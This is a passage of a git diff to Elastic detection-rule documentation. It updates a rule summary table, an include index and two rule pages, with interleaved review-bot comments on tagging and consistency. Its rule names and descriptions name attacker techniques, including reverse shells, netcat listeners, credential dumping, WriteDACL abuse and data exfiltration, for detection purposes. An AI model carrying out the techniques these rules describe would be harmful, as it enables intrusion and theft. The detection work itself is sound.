permissions. With the WRITEDAC permission, the user can perform a Write Discretionary Access Control List (WriteDACL) operation, which is used to modify the access control rules associated with a specific object within Active Directory. Attackers may abuse this privilege to grant themselves or other compromised accounts additional rights, ultimately compromising the target object, resulting in privilege escalation, lateral movement, and persistence. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Active Directory], [Use Case: Active Directory Monitoring], [Rule Type: BBR] |8.3.0 |1 +|<<writedac-access-on-active-directory-object, WRITEDAC Access on Active Directory Object>> |Identifies the access on an object with WRITEDAC permissions. With the WRITEDAC permission, the user can perform a Write Discretionary Access Control List (WriteDACL) operation, which is used to modify the access control rules associated with a specific object within Active Directory. Attackers may abuse this privilege to grant themselves or other compromised accounts additional rights, ultimately compromising the target object, resulting in privilege escalation, lateral movement, and persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Active Directory], [Use Case: Active Directory Monitoring], [Rule Type: BBR] |8.3.0 |2 |<<web-application-suspicious-activity-post-request-declined, Web Application Suspicious Activity: POST Request Declined>> |A POST request to a web application returned a 403 response, which indicates the web application declined to process the request because the action requested was not allowed. |[Data Source: APM] |8.3.0 |102 
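Review bot: the "WRITEDAC Access on Active Directory Object" row keeps [Tactic: Defense Evasion] as its only tactic while its own description says abuse of the permission results "in privilege escalation, lateral movement, and persistence"; if the rule is meant to cover those outcomes the tag list should say so, otherwise the description overstates what the rule is tagged for. The same row opens with "Identifies the access on an object with WRITEDAC permissions", which would read better as "Identifies access to an object with WRITEDAC permissions". The two Volume Shadow Copy rows and the WMIC Remote Command row only reflow the description onto one line and add [Tactic: Execution]; no concerns there.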
@@ -1910,7 +1992,7 @@ and their rule type is `machine_learning`. |<<web-application-suspicious-activity-sqlmap-user-agent, Web Application Suspicious Activity: sqlmap User Agent>> |This is an example of how to detect an unwanted web client user agent. This search matches the user agent for sqlmap 1.3.11, which is a popular FOSS tool for testing web applications for SQL injection vulnerabilities. |[Data Source: APM] |8.3.0 |102 -|<<web-shell-detection-script-process-child-of-common-web-processes, Web Shell Detection: Script Process Child of Common Web Processes>> |Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<web-shell-detection-script-process-child-of-common-web-processes, Web Shell Detection: Script Process Child of Common Web Processes>> |Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Initial Access], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<webproxy-settings-modification, WebProxy Settings Modification>> |Identifies the use of the built-in networksetup command to configure webproxy settings. This may indicate an attempt to hijack web browser traffic for credential access via traffic sniffing or redirection. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |104 
@@ -1924,21 +2006,23 @@ and their rule type is `machine_learning`. |<<windows-cryptoapi-spoofing-vulnerability-cve-2020-0601-curveball, Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601 - CurveBall)>> |A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Use Case: Vulnerability] |8.3.0 |103 -|<<windows-defender-disabled-via-registry-modification, Windows Defender Disabled via Registry Modification>> |Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<windows-defender-disabled-via-registry-modification, Windows Defender Disabled via Registry Modification>> |Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<windows-defender-exclusions-added-via-powershell, Windows Defender Exclusions Added via PowerShell>> |Identifies modifications to the Windows Defender configuration settings using PowerShell to add exclusions at the folder directory or process level. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<windows-event-logs-cleared, Windows Event Logs Cleared>> |Identifies attempts to clear Windows event log stores. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide] |8.3.0 |107 -|<<windows-firewall-disabled-via-powershell, Windows Firewall Disabled via PowerShell>> |Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which can help attackers evade network constraints, like internet and network lateral communication restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<windows-firewall-disabled-via-powershell, Windows Firewall Disabled via PowerShell>> |Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which can help attackers evade network constraints, like internet and network lateral communication restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 + +|<<windows-installer-with-suspicious-properties, Windows Installer with Suspicious Properties>> |Identifies the execution of an installer from an archive or with suspicious properties. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files in an attempt to bypass application whitelisting. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 -|<<windows-network-enumeration, Windows Network Enumeration>> |Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |107 +|<<windows-network-enumeration, Windows Network Enumeration>> |Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |108 |<<windows-registry-file-creation-in-smb-share, Windows Registry File Creation in SMB Share>> |Identifies the creation or modification of a medium-size registry hive file on a Server Message Block (SMB) share, which may indicate an exfiltration attempt of a previously dumped Security Account Manager (SAM) registry hive for credential extraction on an attacker-controlled system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 -|<<windows-script-executing-powershell, Windows Script Executing PowerShell>> |Identifies a PowerShell process launched by either cscript.exe or wscript.exe. Observing Windows scripting processes executing a PowerShell script, may be indicative of malicious activity. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<windows-script-executing-powershell, Windows Script Executing PowerShell>> |Identifies a PowerShell process launched by either cscript.exe or wscript.exe. Observing Windows scripting processes executing a PowerShell script, may be indicative of malicious activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<windows-script-interpreter-executing-process-via-wmi, Windows Script Interpreter Executing Process via WMI>> |Identifies use of the built-in Windows script interpreters (cscript.exe or wscript.exe) being used to execute a process via Windows Management Instrumentation (WMI). This may be indicative of malicious activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<windows-script-interpreter-executing-process-via-wmi, Windows Script Interpreter Executing Process via WMI>> |Identifies use of the built-in Windows script interpreters (cscript.exe or wscript.exe) being used to execute a process via Windows Management Instrumentation (WMI). This may be indicative of malicious activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<windows-service-installed-via-an-unusual-client, Windows Service Installed via an Unusual Client>> |Identifies the creation of a Windows service by an unusual client process. 
Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation] |8.3.0 |105 diff --git a/docs/detections/prebuilt-rules/rule-desc-index.asciidoc b/docs/detections/prebuilt-rules/rule-desc-index.asciidoc index 3b4c7b0b3d..a2e63e0fdb 100644 --- a/docs/detections/prebuilt-rules/rule-desc-index.asciidoc +++ b/docs/detections/prebuilt-rules/rule-desc-index.asciidoc @@ -84,6 +84,7 @@ include::rule-details/apple-script-execution-followed-by-network-connection.asci include::rule-details/apple-scripting-execution-with-administrator-privileges.asciidoc[] include::rule-details/application-added-to-google-workspace-domain.asciidoc[] include::rule-details/application-removed-from-blocklist-in-google-workspace.asciidoc[] +include::rule-details/archive-file-with-unusual-extension.asciidoc[] include::rule-details/at-exe-command-lateral-movement.asciidoc[] include::rule-details/attempt-to-create-okta-api-token.asciidoc[] include::rule-details/attempt-to-deactivate-mfa-for-an-okta-user-account.asciidoc[] 
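Review bot: in the summary-table hunk above, the new "Windows Installer with Suspicious Properties" row lists its tags as "[Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend]", whereas every other BBR row in this table puts [Data Source: Elastic Defend] before [Rule Type: BBR]; reorder for consistency. The "Windows Network Enumeration" row gains [Tactic: Collection], but its description only talks about enumerating hosts with net.exe, which is discovery; confirm Collection is intended rather than carried over from another rule. The reflowed "Windows Script Executing PowerShell" row keeps the comma splice "executing a PowerShell script, may be indicative of malicious activity" in both the removed and added lines; drop the comma while the line is being rewritten anyway. The "Windows Defender Disabled via Registry Modification" bump 106 to 107 has no visible change. The trailing rule-desc-index hunk that adds archive-file-with-unusual-extension is correctly placed between application-removed-from-blocklist and at-exe-command.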
@@ -197,10 +198,10 @@ include::rule-details/cyberark-privileged-access-security-recommended-monitor.as include::rule-details/dns-tunneling.asciidoc[] include::rule-details/dns-over-https-enabled-via-registry.asciidoc[] include::rule-details/default-cobalt-strike-team-server-certificate.asciidoc[] +include::rule-details/delayed-execution-via-ping.asciidoc[] include::rule-details/delete-volume-usn-journal-with-fsutil.asciidoc[] include::rule-details/deleting-backup-catalogs-with-wbadmin.asciidoc[] -include::rule-details/deprecated-potential-dns-tunneling-via-iodine.asciidoc[] -include::rule-details/deprecated-potential-process-injection-via-ld-preload-environment-variable.asciidoc[] +include::rule-details/deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc[] include::rule-details/direct-outbound-smb-connection.asciidoc[] include::rule-details/disable-windows-event-and-security-logs-using-built-in-tools.asciidoc[] include::rule-details/disable-windows-firewall-rules-via-netsh.asciidoc[] 
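Review bot: this hunk drops the deprecated-potential-dns-tunneling-via-iodine and deprecated-potential-process-injection-via-ld-preload-environment-variable includes but adds a new deprecated-potential-reverse-shell-via-suspicious-parent-process include in their place; if the intent is to stop indexing deprecated rules, the new include looks inconsistent, and if deprecated rules are still meant to be indexed the two removals need a reason. Either way, make sure the two rule-details files for the removed includes are deleted in the same change so no orphaned pages remain, and that the rule-details file for the newly included deprecated rule exists, otherwise the asciidoc include will fail at build time. The delayed-execution-via-ping include is correctly placed before delete-volume-usn-journal-with-fsutil.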
@@ -234,14 +235,18 @@ include::rule-details/enumeration-of-privileged-local-groups-membership.asciidoc include::rule-details/enumeration-of-users-or-groups-via-built-in-commands.asciidoc[] include::rule-details/exchange-mailbox-export-via-powershell.asciidoc[] include::rule-details/executable-file-creation-with-multiple-extensions.asciidoc[] +include::rule-details/executable-file-with-unusual-extension.asciidoc[] include::rule-details/execution-from-unusual-directory-command-line.asciidoc[] +include::rule-details/execution-from-a-removable-media-with-network-connection.asciidoc[] include::rule-details/execution-of-com-object-via-xwizard.asciidoc[] include::rule-details/execution-of-file-written-or-modified-by-microsoft-office.asciidoc[] include::rule-details/execution-of-file-written-or-modified-by-pdf-reader.asciidoc[] include::rule-details/execution-of-persistent-suspicious-program.asciidoc[] include::rule-details/execution-of-an-unsigned-service.asciidoc[] include::rule-details/execution-via-electron-child-process-node-js-module.asciidoc[] +include::rule-details/execution-via-ms-visualstudio-pre-post-build-events.asciidoc[] include::rule-details/execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc[] +include::rule-details/execution-via-microsoft-dotnet-clickonce-host.asciidoc[] include::rule-details/execution-via-tsclient-mountpoint.asciidoc[] include::rule-details/execution-via-windows-subsystem-for-linux.asciidoc[] include::rule-details/execution-via-local-sxs-shared-module.asciidoc[] 
@@ -332,6 +337,7 @@ include::rule-details/hping-process-activity.asciidoc[] include::rule-details/iis-http-logging-disabled.asciidoc[] include::rule-details/ipsec-nat-traversal-port-activity.asciidoc[] include::rule-details/image-file-execution-options-injection.asciidoc[] +include::rule-details/image-loaded-with-invalid-signature.asciidoc[] include::rule-details/imageload-via-windows-update-auto-update-client.asciidoc[] include::rule-details/inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc[] include::rule-details/incoming-dcom-lateral-movement-via-mshta.asciidoc[] @@ -353,8 +359,8 @@ include::rule-details/kerberos-cached-credentials-dumping.asciidoc[] include::rule-details/kerberos-pre-authentication-disabled-for-user.asciidoc[] include::rule-details/kerberos-traffic-from-unusual-process.asciidoc[] include::rule-details/kernel-load-or-unload-via-kexec-detected.asciidoc[] -include::rule-details/kernel-module-removal.asciidoc[] include::rule-details/kernel-module-load-via-insmod.asciidoc[] +include::rule-details/kernel-module-removal.asciidoc[] include::rule-details/keychain-password-retrieval-via-command-line.asciidoc[] include::rule-details/kirbi-file-creation.asciidoc[] include::rule-details/kubernetes-anonymous-request-authorized.asciidoc[] 
@@ -387,10 +393,16 @@ include::rule-details/local-scheduled-task-creation.asciidoc[] include::rule-details/mfa-disabled-for-google-workspace-organization.asciidoc[] include::rule-details/ms-office-macro-security-registry-modifications.asciidoc[] include::rule-details/macos-installer-package-spawns-network-event.asciidoc[] +include::rule-details/machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc[] +include::rule-details/machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc[] +include::rule-details/machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc[] +include::rule-details/machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc[] +include::rule-details/machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc[] include::rule-details/malicious-remote-file-creation.asciidoc[] include::rule-details/malware-detected-elastic-endgame.asciidoc[] include::rule-details/malware-prevented-elastic-endgame.asciidoc[] include::rule-details/masquerading-space-after-filename.asciidoc[] +include::rule-details/memory-dump-file-with-unusual-extension.asciidoc[] include::rule-details/microsoft-365-exchange-anti-phish-policy-deletion.asciidoc[] include::rule-details/microsoft-365-exchange-anti-phish-rule-modification.asciidoc[] include::rule-details/microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc[] 
@@ -452,6 +464,7 @@ include::rule-details/my-first-rule.asciidoc[] include::rule-details/ntds-or-sam-database-file-copied.asciidoc[] include::rule-details/namespace-manipulation-using-unshare.asciidoc[] include::rule-details/netcat-listener-established-inside-a-container.asciidoc[] +include::rule-details/netcat-listener-established-via-rlwrap.asciidoc[] include::rule-details/netsh-helper-dll.asciidoc[] include::rule-details/network-activity-detected-via-cat.asciidoc[] include::rule-details/network-connection-via-certutil.asciidoc[] 
@@ -515,21 +528,27 @@ include::rule-details/potential-cookies-theft-via-browser-debugging.asciidoc[] include::rule-details/potential-credential-access-via-dcsync.asciidoc[] include::rule-details/potential-credential-access-via-duplicatehandle-in-lsass.asciidoc[] include::rule-details/potential-credential-access-via-lsass-memory-dump.asciidoc[] +include::rule-details/potential-credential-access-via-memory-dump-file-creation.asciidoc[] include::rule-details/potential-credential-access-via-renamed-com-services-dll.asciidoc[] include::rule-details/potential-credential-access-via-trusted-developer-utility.asciidoc[] include::rule-details/potential-credential-access-via-windows-utilities.asciidoc[] include::rule-details/potential-cross-site-scripting-xss.asciidoc[] +include::rule-details/potential-dga-activity.asciidoc[] include::rule-details/potential-dll-side-loading-via-microsoft-antimalware-service-executable.asciidoc[] -include::rule-details/potential-dll-sideloading-via-trusted-microsoft-programs.asciidoc[] +include::rule-details/potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc[] include::rule-details/potential-dns-tunneling-via-nslookup.asciidoc[] +include::rule-details/potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc[] +include::rule-details/potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc[] +include::rule-details/potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc[] +include::rule-details/potential-data-exfiltration-activity-to-an-unusual-region.asciidoc[] include::rule-details/potential-defense-evasion-via-cmstp-exe.asciidoc[] include::rule-details/potential-defense-evasion-via-proot.asciidoc[] include::rule-details/potential-disabling-of-apparmor.asciidoc[] include::rule-details/potential-disabling-of-selinux.asciidoc[] include::rule-details/potential-evasion-via-filter-manager.asciidoc[] -include::rule-details/potential-exfiltration-via-certreq.asciidoc[] 
include::rule-details/potential-exploitation-of-an-unquoted-service-path-vulnerability.asciidoc[] include::rule-details/potential-external-linux-ssh-brute-force-detected.asciidoc[] +include::rule-details/potential-file-transfer-via-certreq.asciidoc[] include::rule-details/potential-hidden-local-user-account-creation.asciidoc[] include::rule-details/potential-hidden-process-via-mount-hidepid.asciidoc[] include::rule-details/potential-internal-linux-ssh-brute-force-detected.asciidoc[] @@ -543,6 +562,7 @@ include::rule-details/potential-lateral-tool-transfer-via-smb-share.asciidoc[] include::rule-details/potential-linux-backdoor-user-account-creation.asciidoc[] include::rule-details/potential-linux-credential-dumping-via-proc-filesystem.asciidoc[] include::rule-details/potential-linux-credential-dumping-via-unshadow.asciidoc[] +include::rule-details/potential-linux-hack-tool-launched.asciidoc[] include::rule-details/potential-linux-local-account-brute-force-detected.asciidoc[] include::rule-details/potential-linux-ransomware-note-creation-detected.asciidoc[] include::rule-details/potential-linux-ssh-x11-forwarding.asciidoc[] @@ -559,6 +579,7 @@ include::rule-details/potential-meterpreter-reverse-shell.asciidoc[] include::rule-details/potential-microsoft-office-sandbox-evasion.asciidoc[] include::rule-details/potential-modification-of-accessibility-binaries.asciidoc[] include::rule-details/potential-network-scan-detected.asciidoc[] +include::rule-details/potential-network-scan-executed-from-host.asciidoc[] include::rule-details/potential-network-share-discovery.asciidoc[] include::rule-details/potential-network-sweep-detected.asciidoc[] include::rule-details/potential-non-standard-port-http-https-connection.asciidoc[] 
@@ -584,11 +605,13 @@ include::rule-details/potential-privilege-escalation-via-container-misconfigurat include::rule-details/potential-privilege-escalation-via-installerfiletakeover.asciidoc[] include::rule-details/potential-privilege-escalation-via-overlayfs.asciidoc[] include::rule-details/potential-privilege-escalation-via-pkexec.asciidoc[] +include::rule-details/potential-privilege-escalation-via-python-cap-setuid.asciidoc[] include::rule-details/potential-privilege-escalation-via-recently-compiled-executable.asciidoc[] include::rule-details/potential-privilege-escalation-via-sudoers-file-modification.asciidoc[] include::rule-details/potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc[] include::rule-details/potential-privileged-escalation-via-samaccountname-spoofing.asciidoc[] include::rule-details/potential-process-herpaderping-attempt.asciidoc[] +include::rule-details/potential-process-injection-from-malicious-document.asciidoc[] include::rule-details/potential-process-injection-via-powershell.asciidoc[] include::rule-details/potential-protocol-tunneling-via-chisel-client.asciidoc[] include::rule-details/potential-protocol-tunneling-via-chisel-server.asciidoc[] 
@@ -598,14 +621,15 @@ include::rule-details/potential-remote-code-execution-via-web-server.asciidoc[] include::rule-details/potential-remote-credential-access-via-registry.asciidoc[] include::rule-details/potential-remote-desktop-shadowing-activity.asciidoc[] include::rule-details/potential-remote-desktop-tunneling-detected.asciidoc[] +include::rule-details/potential-remote-file-execution-via-msiexec.asciidoc[] include::rule-details/potential-reverse-shell.asciidoc[] include::rule-details/potential-reverse-shell-activity-via-terminal.asciidoc[] include::rule-details/potential-reverse-shell-via-background-process.asciidoc[] include::rule-details/potential-reverse-shell-via-java.asciidoc[] include::rule-details/potential-reverse-shell-via-suspicious-binary.asciidoc[] include::rule-details/potential-reverse-shell-via-suspicious-child-process.asciidoc[] -include::rule-details/potential-reverse-shell-via-suspicious-parent-process.asciidoc[] include::rule-details/potential-reverse-shell-via-udp.asciidoc[] +include::rule-details/potential-ssh-it-ssh-worm-downloaded.asciidoc[] include::rule-details/potential-syn-based-network-scan-detected.asciidoc[] include::rule-details/potential-secure-file-deletion-via-sdelete-utility.asciidoc[] include::rule-details/potential-shadow-credentials-added-to-ad-object.asciidoc[] @@ -622,6 +646,7 @@ include::rule-details/potential-suspicious-clipboard-activity-detected.asciidoc[ include::rule-details/potential-suspicious-debugfs-root-device-access.asciidoc[] include::rule-details/potential-suspicious-file-edit.asciidoc[] include::rule-details/potential-unauthorized-access-via-wildcard-injection-detected.asciidoc[] +include::rule-details/potential-upgrade-of-non-interactive-shell.asciidoc[] include::rule-details/potential-windows-error-manager-masquerading.asciidoc[] include::rule-details/potential-curl-cve-2023-38545-exploitation.asciidoc[] include::rule-details/potential-macos-ssh-brute-force-detected.asciidoc[] 
@@ -697,6 +722,7 @@ include::rule-details/remote-ssh-login-enabled-via-systemsetup-command.asciidoc[ include::rule-details/remote-scheduled-task-creation.asciidoc[] include::rule-details/remote-system-discovery-commands.asciidoc[] include::rule-details/remote-windows-service-installed.asciidoc[] +include::rule-details/remote-xsl-script-execution-via-com.asciidoc[] include::rule-details/remotely-started-services-via-rpc.asciidoc[] include::rule-details/renamed-autoit-scripts-interpreter.asciidoc[] include::rule-details/renamed-utility-executed-with-short-program-name.asciidoc[] @@ -728,6 +754,7 @@ include::rule-details/service-creation-via-local-kerberos-authentication.asciido include::rule-details/service-disabled-via-registry-modification.asciidoc[] include::rule-details/service-path-modification.asciidoc[] include::rule-details/service-path-modification-via-sc-exe.asciidoc[] +include::rule-details/setcap-setuid-setgid-capability-set.asciidoc[] include::rule-details/setuid-setgid-bit-set-via-chmod.asciidoc[] include::rule-details/sharepoint-malware-file-upload.asciidoc[] include::rule-details/shared-object-created-or-changed-by-previously-unknown-process.asciidoc[] @@ -737,6 +764,8 @@ include::rule-details/signed-proxy-execution-via-ms-work-folders.asciidoc[] include::rule-details/softwareupdate-preferences-modification.asciidoc[] include::rule-details/solarwinds-process-disabling-services-via-registry.asciidoc[] include::rule-details/spike-in-aws-error-messages.asciidoc[] +include::rule-details/spike-in-bytes-sent-to-an-external-device.asciidoc[] +include::rule-details/spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc[] include::rule-details/spike-in-failed-logon-events.asciidoc[] include::rule-details/spike-in-firewall-denies.asciidoc[] include::rule-details/spike-in-logon-events.asciidoc[] 
@@ -773,6 +802,7 @@ include::rule-details/suspicious-data-encryption-via-openssl-utility.asciidoc[] include::rule-details/suspicious-emond-child-process.asciidoc[] include::rule-details/suspicious-endpoint-security-parent-process.asciidoc[] include::rule-details/suspicious-execution-from-a-mounted-device.asciidoc[] +include::rule-details/suspicious-execution-via-msiexec.asciidoc[] include::rule-details/suspicious-execution-via-microsoft-office-add-ins.asciidoc[] include::rule-details/suspicious-execution-via-scheduled-task.asciidoc[] include::rule-details/suspicious-execution-via-windows-subsystem-for-linux.asciidoc[] @@ -823,11 +853,15 @@ include::rule-details/suspicious-symbolic-link-created.asciidoc[] include::rule-details/suspicious-sysctl-file-event.asciidoc[] include::rule-details/suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc[] include::rule-details/suspicious-termination-of-esxi-process.asciidoc[] +include::rule-details/suspicious-troubleshooting-pack-cabinet-execution.asciidoc[] include::rule-details/suspicious-utility-launched-via-proxychains.asciidoc[] include::rule-details/suspicious-wmi-event-subscription-created.asciidoc[] include::rule-details/suspicious-wmi-image-load-from-ms-office.asciidoc[] include::rule-details/suspicious-wmic-xsl-script-execution.asciidoc[] include::rule-details/suspicious-werfault-child-process.asciidoc[] +include::rule-details/suspicious-windows-process-cluster-spawned-by-a-host.asciidoc[] +include::rule-details/suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc[] +include::rule-details/suspicious-windows-process-cluster-spawned-by-a-user.asciidoc[] include::rule-details/suspicious-zoom-child-process.asciidoc[] include::rule-details/suspicious-macos-ms-office-child-process.asciidoc[] include::rule-details/suspicious-which-enumeration.asciidoc[] 
@@ -844,6 +878,7 @@ include::rule-details/system-shells-via-services.asciidoc[] include::rule-details/system-time-discovery.asciidoc[] include::rule-details/systemkey-access-via-command-line.asciidoc[] include::rule-details/tcc-bypass-via-mounted-apfs-snapshot-access.asciidoc[] +include::rule-details/tainted-kernel-module-load.asciidoc[] include::rule-details/tampering-of-bash-command-line-history.asciidoc[] include::rule-details/temporarily-scheduled-task-creation.asciidoc[] include::rule-details/third-party-backup-files-deleted-via-unexpected-process.asciidoc[] @@ -863,6 +898,8 @@ include::rule-details/uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc[] include::rule-details/unauthorized-access-to-an-okta-application.asciidoc[] include::rule-details/uncommon-registry-persistence-change.asciidoc[] include::rule-details/unexpected-child-process-of-macos-screensaver-engine.asciidoc[] +include::rule-details/unix-socket-connection.asciidoc[] +include::rule-details/unsigned-bits-service-client-process.asciidoc[] include::rule-details/unsigned-dll-loaded-by-svchost.asciidoc[] include::rule-details/unsigned-dll-loaded-by-a-trusted-process.asciidoc[] include::rule-details/unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc[] 
@@ -907,6 +944,10 @@ include::rule-details/unusual-process-for-mssql-service-accounts.asciidoc[] include::rule-details/unusual-process-for-a-linux-host.asciidoc[] include::rule-details/unusual-process-for-a-windows-host.asciidoc[] include::rule-details/unusual-process-network-connection.asciidoc[] +include::rule-details/unusual-process-spawned-by-a-host.asciidoc[] +include::rule-details/unusual-process-spawned-by-a-parent-process.asciidoc[] +include::rule-details/unusual-process-spawned-by-a-user.asciidoc[] +include::rule-details/unusual-process-writing-data-to-an-external-device.asciidoc[] include::rule-details/unusual-remote-file-directory.asciidoc[] include::rule-details/unusual-remote-file-extension.asciidoc[] include::rule-details/unusual-remote-file-size.asciidoc[] @@ -957,6 +998,7 @@ include::rule-details/windows-defender-disabled-via-registry-modification.asciid include::rule-details/windows-defender-exclusions-added-via-powershell.asciidoc[] include::rule-details/windows-event-logs-cleared.asciidoc[] include::rule-details/windows-firewall-disabled-via-powershell.asciidoc[] +include::rule-details/windows-installer-with-suspicious-properties.asciidoc[] include::rule-details/windows-network-enumeration.asciidoc[] include::rule-details/windows-registry-file-creation-in-smb-share.asciidoc[] include::rule-details/windows-script-executing-powershell.asciidoc[] diff --git a/docs/detections/prebuilt-rules/rule-details/abnormal-process-id-or-lock-file-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/abnormal-process-id-or-lock-file-created.asciidoc index cffa3dfc6a..2ecd4fd11c 100644 --- a/docs/detections/prebuilt-rules/rule-details/abnormal-process-id-or-lock-file-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/abnormal-process-id-or-lock-file-created.asciidoc 
@@ -36,7 +36,7 @@ Identifies the creation of a Process ID (PID), lock or reboot file created in te * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -90,6 +90,7 @@ This rule identifies the creation of PID, lock, or reboot files in the /var/run/ - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query @@ -105,7 +106,7 @@ user.id:0 and file.extension:(pid or lock or reboot) and file.path:(/var/run/* o process.executable : ( ./* or /tmp/* or /var/tmp/* or /dev/shm/* or /var/run/* or /boot/* or /srv/* or /run/* )) -) and not process.name : (go or git) +) and not process.name : (go or git or containerd* or snap-confine) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/access-to-a-sensitive-ldap-attribute.asciidoc b/docs/detections/prebuilt-rules/rule-details/access-to-a-sensitive-ldap-attribute.asciidoc index 28781f6545..edffce920b 100644 --- a/docs/detections/prebuilt-rules/rule-details/access-to-a-sensitive-ldap-attribute.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/access-to-a-sensitive-ldap-attribute.asciidoc @@ -33,10 +33,11 @@ Identify access to sensitive Active Directory object attributes that contains cr * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Privilege Escalation * Use Case: Active Directory Monitoring * Data Source: Active Directory -*Version*: 7 +*Version*: 8 *Rule authors*: 
